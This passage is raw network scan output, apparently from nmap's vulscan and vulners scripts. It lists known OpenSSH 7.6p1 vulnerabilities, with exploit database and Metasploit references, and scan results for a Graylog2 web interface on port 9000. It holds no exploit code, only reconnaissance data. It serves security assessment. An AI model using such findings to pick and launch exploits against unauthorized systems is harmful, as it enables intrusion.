buffer management errors could allow an attacker to execute code [13214] OpenSSH memory vulnerabilities [13191] OpenSSH large packet buffer overflow [12196] OpenSSH could allow an attacker to bypass login restrictions [11970] OpenSSH could allow an attacker to obtain valid administrative account [11902] OpenSSH PAM support enabled information leak [9803] OpenSSH &quot [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse [9307] OpenSSH is running on the system [9169] OpenSSH &quot [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database [8383] OpenSSH off-by-one error in channel code [7647] OpenSSH UseLogin option arbitrary code execution [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges [7179] OpenSSH source IP access control bypass [6757] OpenSSH &quot [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files [6084] OpenSSH 2.3.1 allows remote users to bypass authentication [5517] OpenSSH allows unauthorized access to resources [4646] OpenSSH UseLogin option allows remote users to execute commands as root Exploit-DB - https://www.exploit-db.com: [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth) [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool OpenVAS (Nessus) - http://www.openvas.org: [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability [900179] OpenSSH CBC Mode Information Disclosure Vulnerability [881183] CentOS Update for openssh CESA-2012:0884 centos6 [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386 [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386 [870763] RedHat Update for openssh RHSA-2012:0884-04 [870129] RedHat Update for openssh RHSA-2008:0855-01 [861813] Fedora Update for openssh FEDORA-2010-5429 [861319] Fedora Update for openssh FEDORA-2007-395 [861170] Fedora Update for openssh FEDORA-2007-394 [861012] Fedora Update for openssh FEDORA-2007-715 [840345] Ubuntu Update for openssh vulnerability USN-597-1 [840300] Ubuntu Update for openssh update USN-612-5 [840271] Ubuntu Update for openssh vulnerability USN-612-2 [840268] Ubuntu Update for openssh update USN-612-7 [840259] Ubuntu Update for openssh vulnerabilities USN-649-1 [840214] Ubuntu Update for openssh vulnerability USN-566-1 [831074] Mandriva Update for openssh MDVA-2010:162 (openssh) [830929] Mandriva Update for openssh MDVA-2010:090 (openssh) [830807] Mandriva Update for openssh MDVA-2010:026 (openssh) [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh) [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh) [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt) [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh) [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [100584] OpenSSH X Connections Session Hijacking Vulnerability [100153] OpenSSH CBC Mode Information Disclosure Vulnerability [66170] CentOS Security Advisory CESA-2009:1470 (openssh) [65987] SLES10: Security update for OpenSSH [65819] SLES10: Security update for OpenSSH [65514] SLES9: Security update for OpenSSH [65513] SLES9: Security update for OpenSSH [65334] SLES9: Security update for OpenSSH [65248] SLES9: Security update for OpenSSH [65218] SLES9: Security update for OpenSSH [65169] SLES9: Security update for openssh,openssh-askpass [65126] SLES9: Security update for OpenSSH [65019] SLES9: Security update for OpenSSH [65015] SLES9: Security update for OpenSSH [64931] CentOS Security Advisory CESA-2009:1287 (openssh) [61639] Debian Security Advisory DSA 1638-1 (openssh) [61030] Debian Security Advisory DSA 1576-2 (openssh) [61029] Debian Security Advisory DSA 1576-1 (openssh) [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc) [60803] Gentoo Security Advisory GLSA 200804-03 (openssh) [60667] Slackware Advisory SSA:2008-095-01 openssh [59014] Slackware Advisory SSA:2007-255-01 openssh [58741] Gentoo Security Advisory GLSA 200711-02 (openssh) [57919] Gentoo Security Advisory GLSA 200611-06 (openssh) [57895] Gentoo Security Advisory GLSA 200609-17 (openssh) [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6)) [57492] Slackware Advisory SSA:2006-272-02 openssh [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5) [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc) [57470] FreeBSD Ports: openssh [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc) [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH) [56294] Slackware Advisory SSA:2006-045-06 openssh [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again [53788] Debian Security Advisory DSA 025-1 (openssh) [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc) [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc) [11343] OpenSSH Client Unauthorized Remote Forwarding [10954] OpenSSH AFS/Kerberos ticket/token passing [10883] OpenSSH Channel Code Off by 1 [10823] OpenSSH UseLogin Environment Variables SecurityTracker - https://www.securitytracker.com: [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies OSVDB - http://www.osvdb.org: [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure [70873] OpenSSH Legacy Certificates Stack Memory Disclosure [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation [56921] OpenSSH Unspecified Remote Compromise [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution [43745] OpenSSH X11 Forwarding Local Session Hijacking [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection [37315] pam_usb OpenSSH Authentication Unspecified Issue [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS [34601] OPIE w/ OpenSSH Account Enumeration [34600] OpenSSH S/KEY Authentication Account Enumeration [32721] OpenSSH Username Password Complexity Account Enumeration [30232] OpenSSH Privilege Separation Monitor Weakness [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution [29152] OpenSSH Identical Block Packet DoS [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS [22692] OpenSSH scp Command Line Filename Processing Command Injection [20216] OpenSSH with KerberosV Remote Authentication Bypass [19142] OpenSSH Multiple X11 Channel Forwarding Leaks [19141] OpenSSH GSSAPIAuthentication Credential Escalation [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass [16567] OpenSSH Privilege Separation LoginGraceTime DoS [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness [9550] OpenSSH scp Traversal Arbitrary File Overwrite [6601] OpenSSH *realloc() Unspecified Memory Errors [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow [6073] OpenSSH on FreeBSD libutil Arbitrary File Read [6072] OpenSSH PAM Conversation Function Stack Modification [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass [5408] OpenSSH echo simulation Information Disclosure [5113] OpenSSH NIS YP Netgroups Authentication Bypass [4536] OpenSSH Portable AIX linker Privilege Escalation [3938] OpenSSL and OpenSSH /dev/random Check Failure [3456] OpenSSH buffer_append_space() Heap Corruption [2557] OpenSSH Multiple Buffer Management Multiple Overflows [2140] OpenSSH w/ PAM Username Validity Timing Attack [2112] OpenSSH Reverse DNS Lookup Bypass [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness [1853] OpenSSH Symbolic Link 'cookies' File Removal [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow [730] OpenSSH Channel Code Off by One Remote Privilege Escalation [688] OpenSSH UseLogin Environment Variable Local Command Execution [642] OpenSSH Multiple Key Type ACL Bypass [504] OpenSSH SSHv2 Public Key Authentication Bypass [341] OpenSSH UseLogin Local Privilege Escalation
	vulners	cpe:/a:openbsd:openssh:7.6p1: 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A EXPLOIT MSF:ILITIES/UBUNTU-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/ EXPLOIT MSF:ILITIES/SUSE-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/ EXPLOIT MSF:ILITIES/SUSE-CVE-2019-25017/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/ EXPLOIT MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/ EXPLOIT MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/ EXPLOIT MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/ EXPLOIT MSF:ILITIES/IBM-AIX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/ EXPLOIT MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/ EXPLOIT MSF:ILITIES/DEBIAN-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/ EXPLOIT MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/ EXPLOIT MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ EXPLOIT MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ EXPLOIT EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 EXPLOIT EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 EXPLOIT EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 EXPLOIT EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 EXPLOIT CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 EXPLOIT 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 EXPLOIT SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM EXPLOIT PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 EXPLOIT MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS EXPLOIT EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 EXPLOIT EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 EXPLOIT EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 EXPLOIT EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 EXPLOIT CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 EXPLOIT CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617 MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ EXPLOIT MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ EXPLOIT MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ EXPLOIT CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110 CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109 CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685 PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 EXPLOIT MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS/ 0.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS/ EXPLOIT 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 EXPLOIT
514	tcp	closed	shell	reset
9000	tcp	open	http	syn-ack	Graylog2 web interface
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-vuln-cve2017-1001000	ERROR: Script execution failed (use -d to debug)
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-majordomo2-dir-traversal	ERROR: Script execution failed (use -d to debug)
	vulscan	VulDB - https://vuldb.com: [176763] Bosch IP Camera 7.6x/7.7x Web-based Interface cross site scripting [176762] Bosch IP Camera Web-based Interface cross site scripting [175484] Cisco Prime Infrastructure Web-based Management Interface os command injection [174583] Cisco SD-WAN vManage Software Web-based Interface cross site scripting [174582] Cisco Web Security Appliance Web-based Management Interface cross site scripting [174581] Cisco SD-WAN vManage Software Web-based Messaging Service Interface access control [174566] Content Security Management Appliance Web-based Management Interface information disclosure [174542] Cisco Unified Communications Manager & Presence Service Web-based Management Interface sql injection [174541] Cisco Unified Communications Manager IM & Presence Service Web-based Management Interface sql injection [174342] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [174341] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [174340] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [174339] Cisco FirePOWER Management Center Web-based Management Interface cross site scripting [174329] Cisco ASA/Firepower Threat Defense Web Services Interface buffer overflow [172641] Cisco Small Business RV Series Router Web-based Management Interface memory corruption [172640] Cisco Small Business RV Series Router Web-based Management Interface memory corruption [172637] Cisco RV110W/RV130/RV130W/RV215W Web-based Management Interface memory corruption [172635] Cisco RV340/RV340W/RV345/RV345P Web-based Management Interface deserialization [172634] Cisco RV340/RV340W/RV345/RV345P Web-based Management Interface deserialization [172633] Cisco RV340/RV340W/RV345/RV345P Web-based Management Interface deserialization [172632] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [172631] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [172630] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [172626] Cisco Unified Communications Manager Web-based Management Interface cross site scripting [171946] Xerox VersaLink C9000 Web User Interface unknown vulnerability [171944] Xerox Phaser 6510 Web User Interface unknown vulnerability [171909] Acexy Wireless-N WiFi Repeater 28.08.06.1 Web Management Interface /password.html cleartext transmission [171698] Cisco IOS XE Web Management Interface denial of service [171686] Cisco IOS XE Wireless Controller Web-based Management Interface cross site scripting [171450] Cisco RV132W ADSL2+/RV134W VDSL2 Web-based Management Interface stack-based overflow [170349] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection [170348] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection [170326] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface sql injection [170325] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface sql injection [170324] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection [170323] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface command injection [170320] Aruba ClearPass Policy Manager up to 6.7.14/6.8.8/6.9.4 Web-based Management Interface cross site scripting [170203] Schneider Electric PowerLogic PM800 HTTP Web Interface cross-site request forgery [170101] Cisco Webex Meetings Web-based Interface cross site scriting [170034] McAfee Web Gateway up to 9.2.7 User Interface privileges management [169271] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169270] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169269] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169268] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169267] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169266] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169265] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169264] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169263] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169262] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169261] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169260] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169259] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169258] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169257] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169256] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169255] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169254] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169253] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169252] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169251] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169250] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169249] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169248] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169247] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169246] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169245] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169244] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169243] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169242] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface stack-based overflow [169241] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection [169240] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection [169239] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection [169238] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection [169237] Cisco RV016/RV042/RV042G/RV082/RV320/RV325 Web-based Management Interface command injection [169235] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface pathname traversal [169234] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface pathname traversal [169233] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [169232] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [169231] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [169230] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [169229] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [169228] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [169227] Cisco RV160/RV160W/RV260/RV260P/RV260W Web-based Management Interface unknown vulnerability [168929] D-Link DIR-825 R1 up to 3.0.1 Web Interface buffer overflow [168619] Pepperl+Fuchs P+F Comtrol IO-Link Master up to 1.5.48 Web Interface cross-site request forgery [168562] Cisco SD-WAN vManage Software Web-based Management Interface injection [168560] Cisco SD-WAN vManage Software Web-based Management Interface improper authorization [168559] Cisco SD-WAN vManage Software Web-based Management Interface improper authorization [168557] Cisco SD-WAN vManage Software Web-based Management Interface improper authorization [168541] Cisco Web Security Appliance Web-based Management Interface cross site scripting [168532] Cisco SD-WAN vManage Software Web-based Management Interface path traversal [168521] Cisco SD-WAN vManage Software 